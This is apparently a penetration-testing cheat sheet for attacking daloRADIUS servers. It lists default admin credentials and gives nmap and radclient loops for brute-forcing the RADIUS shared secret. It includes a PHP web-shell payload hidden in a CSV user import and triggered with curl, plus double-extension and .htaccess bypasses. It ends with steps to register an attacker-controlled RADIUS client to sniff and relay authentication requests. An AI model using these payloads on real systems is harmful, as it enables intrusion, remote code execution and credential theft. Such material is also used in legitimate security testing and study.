DaloRADIUS
RADIUS web platform aimed at managing Hotspots and general-purpose ISP deployments
Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect and use a network service.
Port:UDP/1812(authentication),UDP/1813(accounting)Default Credentials: Often uses a shared secret between the client and server.
Enumeration
Login Pages → app/users/login.php and /app/operators/login.php
Default credentials → administrator:radius
Brute-forcing RADIUS shared secret
Nmap radius-brute script
nmap -sU -p 1812 --script radius-brute <target>nmap -sU -p 1812 --script radius-brute --script-args radius-brute.creds=secrets.txt <TARGET_IP>radclient
for secret in $(cat secrets.txt); do echo "User-Name=test" | radclient -x <TARGET_IP> auth "$secret" 2>&1 | grep -q "Received Access-Accept" && echo "[+] Valid Secret Found: $secret" && break; doneecho "User-Name=test" | radclient -x <IP> auth <shared_secret>RCE via File Upload
Log in to the admin panel.
Navigate to:
Config → Import UsersCraft a Malicious
CSV:
username,password
<?php system($_GET['cmd']); ?>,p4ssUpload the File:
http://<target>/daloradius/library/shell.php.csvTrigger
RCE:
curl "http://<target>/daloradius/library/shell.php.csv?cmd=id"If PHP Doesn’t Execute
Try double extensions →
shell.php%00.csvTry to use
.htaccessbypass if is running inApache.Check for
local file inclusionvulnerabilities to include the uploaded file.
Modify RADIUS clients to intercept authentication requests
Navigate to
Management → RADIUS Clients → Add Client
Enter attacker-controlled server as a client:
Client IP/Hostname: <YOUR_ATTACKER_IP>
Secret: hacking123 # Shared secret for interceptionOn your attacker machine run:
# Use radsniff (from FreeRADIUS) to capture requests
radsniff -i eth0 -s hacking123 udp port 1812Relay or Modify Requests (
MitM)
echo "User-Name=victim" | radclient -x <REAL_RADIUS_IP> auth hacking123Last updated